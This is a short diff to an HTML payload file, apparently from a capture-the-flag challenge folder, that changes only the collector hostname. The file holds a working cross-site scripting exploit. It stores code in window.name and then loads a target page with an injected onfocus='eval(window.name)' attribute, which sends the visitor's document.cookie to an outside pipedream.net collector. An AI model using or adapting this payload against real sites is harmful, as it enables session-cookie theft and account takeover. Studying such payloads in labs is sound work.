--- a/19-river-crab-extinction/src/payload1.htm
+++ b/19-river-crab-extinction/src/payload1.htm
@@ -1,4 +1,4 @@
 <script>
-window.name="this.remove();location='http://eoryxdzfzvozbvi.m.pipedream.net/?'+document.cookie";
+window.name="this.remove();location='http://blah.m.pipedream.net/?'+document.cookie";
 location="http://example.com/Variants/AVTest'onfocus='eval(window.name)'name='z'z='#z";
 </script>
